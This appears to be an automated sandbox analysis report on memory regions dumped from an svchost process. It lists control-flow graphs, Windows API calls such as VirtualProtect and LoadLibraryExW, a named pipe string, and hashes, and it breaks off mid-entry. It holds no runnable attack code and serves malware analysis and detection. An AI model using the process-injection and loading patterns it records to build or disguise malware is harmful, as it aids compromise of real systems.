                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 36637897c93c8ede7bb1ce85cbdc6512425acb20b5d3eb7c994f69eec6c0aa17
                                                  • Instruction ID: 41ca06233fa5f2871d1bcf4f3eaca7c7be510063e23763d47a878ad204f22085
                                                  • Opcode Fuzzy Hash: 36637897c93c8ede7bb1ce85cbdc6512425acb20b5d3eb7c994f69eec6c0aa17
                                                  • Instruction Fuzzy Hash: E1314822B50B418BE714EB66A84CB5A73A9B78AF95F0C4125DE4B63724DF3CC44A8681

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 323 2a66130aed0-2a66130af37 call 2a66130bde8 326 2a66130b398-2a66130b39f call 2a66130d098 323->326 327 2a66130af3d-2a66130af40 323->327 327->326 328 2a66130af46-2a66130af4c 327->328 330 2a66130b01b-2a66130b02d 328->330 331 2a66130af52-2a66130af56 328->331 333 2a66130b2e8-2a66130b2ec 330->333 334 2a66130b033-2a66130b037 330->334 331->330 335 2a66130af5c-2a66130af67 331->335 338 2a66130b2ee-2a66130b2f5 333->338 339 2a66130b325-2a66130b32f call 2a661308fe4 333->339 334->333 336 2a66130b03d-2a66130b048 334->336 335->330 337 2a66130af6d-2a66130af72 335->337 336->333 340 2a66130b04e-2a66130b055 336->340 337->330 341 2a66130af78-2a66130af82 call 2a661308fe4 337->341 338->326 342 2a66130b2fb-2a66130b320 call 2a66130b3a0 338->342 339->326 352 2a66130b331-2a66130b350 call 2a661307d30 339->352 344 2a66130b219-2a66130b225 340->344 345 2a66130b05b-2a66130b096 call 2a66130a180 340->345 341->352 357 2a66130af88-2a66130afb3 call 2a661308fe4 * 2 call 2a66130a488 341->357 342->339 344->339 349 2a66130b22b-2a66130b22f 344->349 345->344 361 2a66130b09c-2a66130b0a5 345->361 354 2a66130b23f-2a66130b247 349->354 355 2a66130b231-2a66130b23d call 2a66130a448 349->355 354->339 360 2a66130b24d-2a66130b25a call 2a66130a020 354->360 355->354 367 2a66130b260-2a66130b268 355->367 390 2a66130afd3-2a66130afdd call 2a661308fe4 357->390 391 2a66130afb5-2a66130afb9 357->391 360->339 360->367 365 2a66130b0aa-2a66130b0dc 361->365 369 2a66130b208-2a66130b20f 365->369 370 2a66130b0e2-2a66130b0ee 365->370 373 2a66130b37b-2a66130b397 call 2a661308fe4 * 2 call 2a66130cff8 367->373 374 2a66130b26e-2a66130b272 367->374 369->365 372 2a66130b215 369->372 370->369 375 2a66130b0f4-2a66130b10d 370->375 372->344 373->326 377 2a66130b285 374->377 378 2a66130b274-2a66130b283 call 2a66130a448 374->378 380 2a66130b113-2a66130b158 call 2a66130a45c * 2 375->380 381 2a66130b205 375->381 383 2a66130b288-2a66130b292 call 2a66130be80 377->383 378->383 405 2a66130b196-2a66130b19c 380->405 406 2a66130b15a-2a66130b180 call 2a66130a45c call 2a66130b610 380->406 381->369 383->339 401 2a66130b298-2a66130b2e6 call 2a66130a0b0 call 2a66130a2b4 383->401 390->330 408 2a66130afdf-2a66130afff call 2a661308fe4 * 2 call 2a66130be80 390->408 391->390 397 2a66130afbb-2a66130afc6 391->397 397->390 402 2a66130afc8-2a66130afcd 397->402 401->339 402->326 402->390 412 2a66130b19e-2a66130b1a2 405->412 413 2a66130b200 405->413 422 2a66130b1a7-2a66130b1fb call 2a66130adfc 406->422 423 2a66130b182-2a66130b194 406->423 427 2a66130b016 408->427 428 2a66130b001-2a66130b00b call 2a66130bf70 408->428 412->380 413->381 422->413 423->405 423->406 427->330 431 2a66130b011-2a66130b374 call 2a661308c44 call 2a66130b9cc call 2a661308e38 428->431 432 2a66130b375-2a66130b37a call 2a66130cff8 428->432 431->432 432->373
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 31653785dc960ea28704927179ae8f8438071b28d477621c124d78babdf68865
                                                  • Instruction ID: 7fbf99ff9268d44134f5a0de157e7e046861f6999c74072d991d70854743c5b0
                                                  • Opcode Fuzzy Hash: 31653785dc960ea28704927179ae8f8438071b28d477621c124d78babdf68865
                                                  • Instruction Fuzzy Hash: C1D18136B0074087EB609B65D44C39D77E8F756B89F184115EE8A6BB59CF38C498C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000003.1748146841.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_3_2a6612d0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 1a69dcc4a857e1a8acaf5f70824e8ee75a6218c9c0f8a8e2485de44cbd3ea7a5
                                                  • Instruction ID: 000768430ed8eae066c0ea2a2243169fe31ca941bba5b52687ad7118b13daba8
                                                  • Opcode Fuzzy Hash: 1a69dcc4a857e1a8acaf5f70824e8ee75a6218c9c0f8a8e2485de44cbd3ea7a5
                                                  • Instruction Fuzzy Hash: 58D17D32F00B408BEB649B25D44C79D77ACFB86B88F184215EA8957BA5DF38C4D9C742

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 442 2a66130fce4-2a66130fd36 443 2a66130fe27 442->443 444 2a66130fd3c-2a66130fd3f 442->444 447 2a66130fe29-2a66130fe45 443->447 445 2a66130fd49-2a66130fd4c 444->445 446 2a66130fd41-2a66130fd44 444->446 448 2a66130fe0c-2a66130fe1f 445->448 449 2a66130fd52-2a66130fd61 445->449 446->447 448->443 450 2a66130fd71-2a66130fd90 LoadLibraryExW 449->450 451 2a66130fd63-2a66130fd66 449->451 454 2a66130fe46-2a66130fe5b 450->454 455 2a66130fd96-2a66130fd9f GetLastError 450->455 452 2a66130fe66-2a66130fe75 GetProcAddress 451->452 453 2a66130fd6c 451->453 458 2a66130fe77-2a66130fe9e 452->458 459 2a66130fe05 452->459 456 2a66130fdf8-2a66130fdff 453->456 454->452 457 2a66130fe5d-2a66130fe60 FreeLibrary 454->457 460 2a66130fde6-2a66130fdf0 455->460 461 2a66130fda1-2a66130fdb8 call 2a66130d278 455->461 456->449 456->459 457->452 458->447 459->448 460->456 461->460 464 2a66130fdba-2a66130fdce call 2a66130d278 461->464 464->460 467 2a66130fdd0-2a66130fde4 LoadLibraryExW 464->467 467->454 467->460
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeLibraryProc
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3013587201-537541572
                                                  • Opcode ID: 8fab418be913b1dd9c03b8cb16d38d32b5f0f709c7bacb4f0a2a12f1537edad2
                                                  • Instruction ID: a49c4f8528d2085b060a30bd601e0e57271e6c91806b92313c4f6392c4d0f87c
                                                  • Opcode Fuzzy Hash: 8fab418be913b1dd9c03b8cb16d38d32b5f0f709c7bacb4f0a2a12f1537edad2
                                                  • Instruction Fuzzy Hash: 1041BF21B21A0083EA15DB26A90C75522DDB746FE1F0C82259D1FA7795EF3CC84DC386

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 468 2a66130104c-2a6613010b9 RegQueryInfoKeyW 469 2a6613010bf-2a6613010c9 468->469 470 2a6613011b5-2a6613011d0 468->470 469->470 471 2a6613010cf-2a66130111f RegEnumValueW 469->471 472 2a6613011a5-2a6613011af 471->472 473 2a661301125-2a66130112a 471->473 472->470 472->471 473->472 474 2a66130112c-2a661301135 473->474 475 2a661301147-2a66130114c 474->475 476 2a661301137 474->476 478 2a661301199-2a6613011a3 475->478 479 2a66130114e-2a661301193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 475->479 477 2a66130113b-2a66130113f 476->477 477->472 480 2a661301141-2a661301145 477->480 478->472 479->478 480->475 480->477
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 5adff6ada05b66aa146935fce20443cd5743e8ff68fb0e8e1f1600fcf5731c5e
                                                  • Instruction ID: 174b0167307c4a9ab09426a92bc32f1fb8edaeb8c755a6995d23063d7da22963
                                                  • Opcode Fuzzy Hash: 5adff6ada05b66aa146935fce20443cd5743e8ff68fb0e8e1f1600fcf5731c5e
                                                  • Instruction Fuzzy Hash: F6415C32614B80C7E764CF61E44839A77B5F389F99F488129DA8A17B58DF3CC589CB41

                                                  Control-flow Graph

                                                  APIs
                                                  • FlsGetValue.KERNEL32(?,?,?,000002A66130D12E,?,?,?,?,?,?,?,?,000002A66130D8ED,?,?,00000001), ref: 000002A66130D9D7
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130D12E,?,?,?,?,?,?,?,?,000002A66130D8ED,?,?,00000001), ref: 000002A66130D9F6
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130D12E,?,?,?,?,?,?,?,?,000002A66130D8ED,?,?,00000001), ref: 000002A66130DA1E
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130D12E,?,?,?,?,?,?,?,?,000002A66130D8ED,?,?,00000001), ref: 000002A66130DA2F
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130D12E,?,?,?,?,?,?,?,?,000002A66130D8ED,?,?,00000001), ref: 000002A66130DA40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID: 1%$Y%
                                                  • API String ID: 3702945584-1395475152
                                                  • Opcode ID: 6756a61c19cd3a2654bc82cc989f9db1f24638631997e6e01126e156054fbc07
                                                  • Instruction ID: 24000822b7a6cd693cd216e436044db4a7e6db75baa091443d1fc6b2e3441c14
                                                  • Opcode Fuzzy Hash: 6756a61c19cd3a2654bc82cc989f9db1f24638631997e6e01126e156054fbc07
                                                  • Instruction Fuzzy Hash: 50114F10F0524043FA58A736699D77961CE9B46FB1F0C5328A93B676D6DF2CD48E8282

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\x4childproc
                                                  • API String ID: 166002920-1140171592
                                                  • Opcode ID: 0218981624b79cd85621b87b3d98e60b90bbe0fcc300a77231272d113fd18cb7
                                                  • Instruction ID: 3f15bb93192625fd40b78d2363c626aec29419af21cb11796a4ebb500e2df56c
                                                  • Opcode Fuzzy Hash: 0218981624b79cd85621b87b3d98e60b90bbe0fcc300a77231272d113fd18cb7
                                                  • Instruction Fuzzy Hash: 9F113736A28B4083F710CB25F40D35A77A4F38AFA5F584215EA9A13AA8CF3CC148CB41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction ID: 267296f0deaca55c71130b685b92cacdfc470510d15ace70d047c0cca7c556f8
                                                  • Opcode Fuzzy Hash: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction Fuzzy Hash: 3A81D321F0064187FA54AB65984E39962DCAB87F82F4C4415DE8B73796DF3CC98E87C2
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002A66130A6E7,?,?,?,000002A66130911C,?,?,?,?,000002A661308C25), ref: 000002A66130A5AD
                                                  • GetLastError.KERNEL32(?,?,?,000002A66130A6E7,?,?,?,000002A66130911C,?,?,?,?,000002A661308C25), ref: 000002A66130A5BB
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002A66130A6E7,?,?,?,000002A66130911C,?,?,?,?,000002A661308C25), ref: 000002A66130A5E5
                                                  • FreeLibrary.KERNEL32(?,?,?,000002A66130A6E7,?,?,?,000002A66130911C,?,?,?,?,000002A661308C25), ref: 000002A66130A653
                                                  • GetProcAddress.KERNEL32(?,?,?,000002A66130A6E7,?,?,?,000002A66130911C,?,?,?,?,000002A661308C25), ref: 000002A66130A65F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: d13716cb052cff671a6102bc29061a61341be46a7543b943372d3602c3dab51e
                                                  • Instruction ID: 8399d82576a438532a42befffc53458c05a735cdb103841c25f0dc162422a735
                                                  • Opcode Fuzzy Hash: d13716cb052cff671a6102bc29061a61341be46a7543b943372d3602c3dab51e
                                                  • Instruction Fuzzy Hash: D2318D22B12640D2EE129B16A80C75933E8B746FB1F1D4625DD5E6B3A0DF3CC44D8792
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 404f8ad15a8ca5440fd66a0879b8ed7fae2f87739d18727aa04e6e2736d64f5f
                                                  • Instruction ID: 397fd9d65da9ac9f2feb91a49e181d15f1ee560d74e2603ac4cf8e52f85c355d
                                                  • Opcode Fuzzy Hash: 404f8ad15a8ca5440fd66a0879b8ed7fae2f87739d18727aa04e6e2736d64f5f
                                                  • Instruction Fuzzy Hash: 28116021B20B4087E7509B52E85D31972A8F78AFE4F1C4224EA6F97BA4DF3CC4088741
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID: wr
                                                  • API String ID: 1092925422-2678910430
                                                  • Opcode ID: 5cb5b95a7894899fc9eb5752d55467de447e254151c1921a767ae76168264666
                                                  • Instruction ID: 76c9e880f8119461ed0d2b2e451c0b5c8c1436471a755fc728a916c1281ccd6a
                                                  • Opcode Fuzzy Hash: 5cb5b95a7894899fc9eb5752d55467de447e254151c1921a767ae76168264666
                                                  • Instruction Fuzzy Hash: B0117C2AB00B4087EF149B22E40C66972A8F74AF95F0C0028DE8E53794EF3DC648C706
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 3c71be769f0a5cb5e2c769ed66c005fe4416e84d447ca1635e312c6679bbf07e
                                                  • Instruction ID: ba810c4c4ec3766f0813efa9c68f5a7e1118d77ba1f7749a5b38762fff97d695
                                                  • Opcode Fuzzy Hash: 3c71be769f0a5cb5e2c769ed66c005fe4416e84d447ca1635e312c6679bbf07e
                                                  • Instruction Fuzzy Hash: 89D1C876708B8882EA70DB16E49835AB7E4F389F85F140116EACE577A9CF3CC585CB41
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,000002A66130E005,?,?,?,?,000002A66130E0C8), ref: 000002A66130D8FF
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130E005,?,?,?,?,000002A66130E0C8), ref: 000002A66130D935
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130E005,?,?,?,?,000002A66130E0C8), ref: 000002A66130D962
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130E005,?,?,?,?,000002A66130E0C8), ref: 000002A66130D973
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130E005,?,?,?,?,000002A66130E0C8), ref: 000002A66130D984
                                                  • SetLastError.KERNEL32(?,?,?,000002A66130E005,?,?,?,?,000002A66130E0C8), ref: 000002A66130D99F
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2506987500-0
                                                  • Opcode ID: dbd57d8dc0b21b25a460add1d444d3211eb3e7612d5fcd27e023ff0818d74411
                                                  • Instruction ID: bac775aea754a650712559fdb6446204fdea8ef53a4a3c659373d36be326e94c
                                                  • Opcode Fuzzy Hash: dbd57d8dc0b21b25a460add1d444d3211eb3e7612d5fcd27e023ff0818d74411
                                                  • Instruction Fuzzy Hash: 5C113D20B0564043FA54A7369A9D32962DFAB47FB1F0C4724A97B276D6DF2C844D82C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 6e434f9027214566f227db2d997bb0a869563547e9da787854957d847e80d4fa
                                                  • Instruction ID: 0f29be0132cdc0cfcd30ef096ed24f2db18aed69f358a6f48d55412919f70f9a
                                                  • Opcode Fuzzy Hash: 6e434f9027214566f227db2d997bb0a869563547e9da787854957d847e80d4fa
                                                  • Instruction Fuzzy Hash: 31015735B00B4083EA20DB12E89C35A62A9F789FC4F4C4034DE8A53794DF3CC9898781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: 6417028e0581c33fb66ecbcc2788d1ac89801e3df6f6497bc360079463109eef
                                                  • Instruction ID: 004001d7623d7cfb64693ac6ec861b4d10307cd0f1bfbe24043bef9d662cdbcb
                                                  • Opcode Fuzzy Hash: 6417028e0581c33fb66ecbcc2788d1ac89801e3df6f6497bc360079463109eef
                                                  • Instruction Fuzzy Hash: 4501DB29B51B4087EB249B21E84D71973A8EB4AF45F0C0429C94E277A5EF3DC54CC746
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
